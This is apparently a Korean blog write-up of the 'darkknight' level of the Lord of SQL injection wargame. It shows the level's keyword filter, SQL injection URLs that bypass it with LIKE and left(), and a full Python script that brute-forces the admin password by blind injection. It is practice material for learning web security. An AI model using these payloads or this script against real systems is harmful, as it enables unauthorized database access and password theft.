소스코드 분석
if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe");
싱글쿼터 substr ascii = 필터링을 해놨다.
pw부분을 사용을 할려면 싱글쿼터를 사용 해야하는데 막아놨으니
no쪽을 공략한다.
?pw=1234&no=123%20or%20id%20LIKE%20"admin"%20and%20length(pw)%20like%208
?pw=1234&no=123%20or%20id%20LIKE%20"admin"%20and%20left(pw,1)%20like%20"1"
import http.client
result=''
leng=0
header={'Cookie':' '}
string="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"
for i in range(1,100) :
length='/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=1234&no=123%20or%20id%20LIKE%20"admin"%20and%20length(pw)%20like%20'+str(i)
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',length,'',header)
data=conn.getresponse().read()
if "Hello admin" in data.decode():
leng = i
print ("pw length: "+str(i))
break
for i in range(1,leng+1):
for j in range(0,76):
substr='/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=1234&no=123%20or%20id%20LIKE%20"admin"%20and left(pw,'+str(i)+')%20like%20'+'"'+result+string[j]+'"'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',substr,'',header)
data=conn.getresponse().read()
if 'Hello admin' in data.decode():
result=result+string[j]
print ('left(pw,'+str(i)+')= '+result)
break
print ('Password is '+result)
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] giant (0) | 2017.05.28 |
|---|---|
| [Lord of SQL injection] bugbear (0) | 2017.05.28 |
| [Lord of SQL injection] golem (0) | 2017.05.26 |
| [Lord of SQL injection] skeleton (0) | 2017.05.25 |
| [Lord of SQL injection] vampire (0) | 2017.05.25 |
